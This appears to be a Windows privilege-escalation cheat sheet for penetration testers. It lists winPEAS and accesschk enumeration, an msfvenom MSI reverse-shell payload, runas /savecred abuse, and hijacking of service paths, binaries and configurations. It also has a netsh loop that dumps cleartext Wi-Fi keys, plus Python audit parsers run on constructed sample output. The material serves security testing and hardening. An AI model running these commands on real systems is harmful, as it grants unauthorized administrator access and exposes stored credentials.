Windows Privilege Escalation

Tool References

  • WinPEAS - Script (.bat) or stand-alone executable that searches for privilege escalation paths.

  • Windows Exploit Suggester - Provides a list of vulnerabilities based on the output of Windows' 'systeminfo' utility.

  • AccessChk - Microsoft utility that reports permissions on securable objects, account rights for a user or group, or token details for a process.

  • LOLBAS - Aggregated list of binaries, scripts, and libraries that can be used for Living Off the Land techniques.

  • Service Controller (SC) Utility - Built-in Microsoft utility for viewing and configuring services.

  • Reg Command - Built-in Microsoft utility for configuring or querying registry key information.

winPEAs

#Enable Colors
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

#Run winPEAS: omit the banner, perform all checks, do not sleep between checks. Add 'notcolor' to avoid color output
winpeas.exe quiet cmd searchfast > <output>

#User Information Checks
winpeas.exe quiet userinfo

#Application Information Checks
winpeas.exe quiet applicationsinfo

#Credential Checks
winpeas.exe quiet windowscreds

#Files Information Checks
winpeas.exe quiet filesinfo

Manual PrivEsc Enumeration & Exploitation

AlwaysInstallElevated MSI File Packages

MSI files are package files used to install applications and can be configured to run with elevated privileges.

#Query the registry to confirm the setting is enabled in both hives: the "AlwaysInstallElevated" value must be 1 under both the local machine (HKLM) and the current user (HKCU)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

#Create MSI reverse shell with msfvenom
msfvenom -p <payload> LHOST=<IP_ADDRESS> -f msi -o <output_filename.msi>

#Execute the MSI file
msiexec /quiet /qn /i <output_filename.msi>
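As an added audit example (not part of the original page), the following Python parses the output of the two reg query commands above and reports the policy as exploitable only when both hives set the value to a non-zero DWORD. The reg query output embedded here is constructed, not captured from a real host.

```python
import re

# Constructed sample output of the two 'reg query' commands (not captured from a real host).
HKLM_OUTPUT = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_OUTPUT = """
HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
# Constructed: what 'reg query' prints when the policy key does not exist (the default state).
KEY_MISSING_OUTPUT = "ERROR: The system was unable to find the specified registry key or value."

# One value line: name, REG_DWORD, then the data as hex (0x1) or decimal.
VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$", re.MULTILINE
)


def always_install_elevated(reg_output: str) -> bool:
    """True only if the value exists in this hive's output and is non-zero."""
    match = VALUE_RE.search(reg_output)
    if match is None:
        return False  # value absent: policy not configured, so it is off
    return int(match.group(1), 0) != 0


def is_misconfigured(hklm_output: str, hkcu_output: str) -> bool:
    """The installer runs elevated only when BOTH the machine and the user policy are 1."""
    return always_install_elevated(hklm_output) and always_install_elevated(hkcu_output)


if __name__ == "__main__":
    print("HKLM:", always_install_elevated(HKLM_OUTPUT))
    print("HKCU:", always_install_elevated(HKCU_OUTPUT))
    print("AlwaysInstallElevated exploitable:", is_misconfigured(HKLM_OUTPUT, HKCU_OUTPUT))
```

The remediation is the Group Policy setting "Always install with elevated privileges" (Windows Components > Windows Installer) set to Disabled in both Computer and User Configuration; a single hive set to 1 is not enough for the escalation, which is why the check requires both.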

Saved Credentials 'Run As'

Windows has a "Run As" command which allows users to run commands with the privileges of other users. This normally requires the other user's password; however, Windows allows those credentials to be saved on the system, which bypasses that requirement.

#Search for stored credentials for admins
cmdkey /list

#Use native runas command to execute a payload under the context of an admin
runas /savecred /user:<USER_NAME> <C:\Path_to\PrivEscPayload…>

Service Vulnerabilities

#Query all services (service_name, display_name, type, state)
sc query state= all

#Query individual service information (type, state_type, binary_path_name, dependencies, service_start_name)
sc qc <SERVICE_NAME>

#One-liner to query each service_name using sc query, and pass each service_name into sc qc
for /f "tokens=2" %s in ('sc query state^= all ^| find "SERVICE_NAME"') do @sc qc %s

Unquoted Service Paths

#Check for services that have unquoted service paths:
##This lists every service's configuration; inspect each BINARY_PATH_NAME for a path that contains spaces but is not wrapped in quotes
for /f "tokens=2" %s in ('sc query state^= all ^| find "SERVICE_NAME"') do @sc qc %s

#Enumerate targeted service(s) names, binary paths, type, state, and dependencies
sc query <SERVICE_NAME>
sc qc <SERVICE_NAME>

#Check if we have permissions to start and/or stop the service(s) (SERVICE_STOP, SERVICE_START) or a higher level of access (SERVICE_ALL_ACCESS)
##Suppress errors, Name is Windows Service, Omit Banner, Verbose
accesschk.exe /accepteula -ucqv <current_user> <service_name>

#Check for write permissions in each directory in the existing binary path (run once per directory, e.g. "C:\" and "C:\file path")
##Suppress errors, show objects with write access, only process directories, omit banner
accesschk.exe /accepteula -uwdq "C:\file path"

#Place payload in writeable path
##C:\file path\service.exe where service.exe is our reverse shell executable

#Stop and/or Start service, or force restart the machine 
net stop <SERVICE_NAME>
net start <SERVICE_NAME>

Insecure Service Executables

#Check for binaries that our current user has access to
##Using AccessChk - Suppress errors, show objects with write access, recursive search
accesschk.exe /accepteula -uws <USERNAME_or_EVERYONE> "C:\Program Files\"
##Using PowerShell - Get the ACL for all files in Program Files that are modifiable by "Everyone"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"} | Format-Table -Wrap

#Check if any services are running the writable/modifiable binaries, or from a non-standard location (e.g. not C:\Program Files...)
for /f "tokens=2" %s in ('sc query state^= all ^| find "SERVICE_NAME"') do @sc qc %s

#Check if we have permissions to start and/or stop the service(s) (SERVICE_STOP, SERVICE_START) or a higher level of access (SERVICE_ALL_ACCESS)
##Suppress errors, Name is Windows Service, Omit Banner, Verbose
accesschk.exe /accepteula -ucqv <CURRENT_USER> <SERVICE_NAME>

#Stop the service 
net stop <SERVICE_NAME>

#Backup the binary
copy <binary> <backup_binary>

#Overwrite the original binary with a payload

#Start the service
net start <SERVICE_NAME>
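A parser for the sc qc output that the Unquoted Service Paths and Insecure Service Executables sections above collect by hand, added here as an example and not taken from the page or any tool it references. It flags unquoted binary paths containing spaces, lists the directories whose write ACLs must be reviewed (the same directories accesschk -uwdq is run against above), and flags service binaries outside the standard program directories. The service names, paths and sc qc output are constructed.

```python
import ntpath
import re

# Constructed sample: concatenated output of 'sc qc' for three services (not from a real host).
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GoodSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Good Vendor\svc.exe" -run
        DISPLAY_NAME       : Good Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: UnquotedSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Some Vendor\Tool Suite\agent.exe -svc
        DISPLAY_NAME       : Unquoted Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OddPlaceSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Temp\updater.exe
        DISPLAY_NAME       : Odd Place Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# 'FIELD_NAME : value' lines as printed by sc qc.
FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")
# Directories where service binaries are expected; anything else is flagged for review.
STANDARD_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_sc_qc(output: str) -> dict:
    """Map SERVICE_NAME -> {field: value} from concatenated 'sc qc' output."""
    services, current = {}, None
    for line in output.splitlines():
        match = FIELD_RE.match(line)
        if match is None:
            continue
        key, value = match.group(1), match.group(2).strip()
        if key == "SERVICE_NAME":
            current = services.setdefault(value, {})
        elif current is not None:
            current[key] = value
    return services


def executable_path(binary_path_name: str) -> str:
    """Drop the argument tail: the quoted path, or the text up to and including '.exe'."""
    bp = binary_path_name.strip()
    if bp.startswith('"'):
        end = bp.find('"', 1)
        return bp[1:end] if end > 0 else bp[1:]
    match = re.search(r"\.exe", bp, re.IGNORECASE)
    return bp[: match.end()] if match else bp.split(" ")[0]


def unquoted_search_candidates(binary_path_name: str) -> list:
    """For an unquoted path with spaces, the files Windows would try before the real binary.

    CreateProcess treats each space as a possible end of the executable name, so the
    directories holding these candidates must not be writable by non-administrators.
    """
    bp = binary_path_name.strip()
    if bp.startswith('"'):
        return []
    exe = executable_path(bp)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit_services(output: str) -> dict:
    """Return {service_name: [finding, ...]} for the weaknesses the page enumerates by hand."""
    findings = {}
    for name, cfg in parse_sc_qc(output).items():
        issues = []
        bp = cfg.get("BINARY_PATH_NAME", "")
        for candidate in unquoted_search_candidates(bp):
            issues.append("unquoted path: check write ACL on " + ntpath.dirname(candidate))
        exe = executable_path(bp)
        if not exe.lower().startswith(STANDARD_ROOTS):
            issues.append("non-standard binary location: " + exe)
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for svc, issues in audit_services(SC_QC_OUTPUT).items():
        print(svc)
        for issue in issues:
            print("   ", issue)
```

Feed it the redirected output of the for /f one-liner above. The fix for an unquoted path is to wrap BINARY_PATH_NAME in quotes with sc config binPath= "..."; a non-standard location is only a lead, so follow it up with the accesschk -uws check on the directory.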

Insecure Service Properties

#Check for services we have write access to and can start/stop (SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS, SERVICE_STOP, SERVICE_START)
##Suppress errors, show only objects with write access, Name is a Windows Service, omit banner, verbose output
accesschk.exe /accepteula -uwcqv <current_user> *


#Query individual service information (or use the "for" script from above) to view the options we could reconfigure, the privileges (SERVICE_START_NAME), dependencies, Binary Path, etc.
sc qc <SERVICE_NAME>
sc query <SERVICE_NAME>

#Stop the service (if necessary)
net stop <SERVICE_NAME>

#Reconfigure options as needed
##Example: modify BINARY_PATH_NAME
sc config <service_name> binPath= "C:\...\file.exe"
##Example: remove dependencies
sc config <service_name> depend= ""
##Example: modify the account the service starts as (SERVICE_START_NAME)
sc config <service_name> obj= ".\LocalSystem" password= ""

#Start the service
net start <SERVICE_NAME>

Extract Cleartext Wireless Passwords

#WiFi passwords can be revealed in cleartext with the following command. Useful to build a dictionary and check for password reuse:
netsh wlan show profiles name="<network_name>" key=clear

#Script that loops through each wlan profile name and outputs the cleartext password for each (NetworkName:Password). Note: "tokens=5" keeps only the first word of an SSID that contains spaces, so those profiles will not resolve
FOR /f "tokens=5" %i in ('netsh wlan show profiles ^| find "All User Profile"') do @FOR /f "tokens=4" %s in ('netsh wlan show profiles name^="%i" key^=clear ^| find "Key Content"') do @echo %i:%s
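The same extraction done as an offline parse of saved netsh output, added here as an example that is not part of the original page: it takes the SSID as everything after the first colon, so names containing spaces survive (the tokens=5 loop above truncates them), and it groups profiles by shared key so reuse is visible. The netsh output, SSIDs and keys are constructed.

```python
# Constructed sample output of 'netsh wlan show profiles' (not from a real host).
PROFILES_OUTPUT = """
Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : Home Network 5G
    All User Profile     : CoffeeShop
"""

# Constructed sample output of 'netsh wlan show profiles name="<ssid>" key=clear', one per SSID.
KEY_OUTPUTS = {
    "Home Network 5G": """
Profile Home Network 5G on interface Wi-Fi:
Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : Winter 2023!
""",
    "CoffeeShop": """
Profile CoffeeShop on interface Wi-Fi:
Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : Winter 2023!
""",
}


def parse_profile_names(output: str) -> list:
    """Everything after the first ':' is the SSID, so names with spaces are kept whole."""
    return [line.split(":", 1)[1].strip()
            for line in output.splitlines()
            if "All User Profile" in line]


def parse_key_content(output: str):
    """Return the stored key, or None for an open network / profile without a key."""
    for line in output.splitlines():
        if line.strip().startswith("Key Content"):
            return line.split(":", 1)[1].strip()
    return None


def reuse_groups(profiles: list, key_outputs: dict) -> dict:
    """Group SSIDs that share a key; only groups of two or more are reported."""
    groups = {}
    for ssid in profiles:
        key = parse_key_content(key_outputs.get(ssid, ""))
        if key:
            groups.setdefault(key, []).append(ssid)
    return {key: ssids for key, ssids in groups.items() if len(ssids) > 1}


if __name__ == "__main__":
    names = parse_profile_names(PROFILES_OUTPUT)
    for key, ssids in reuse_groups(names, KEY_OUTPUTS).items():
        print("key shared by:", ", ".join(ssids))
```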
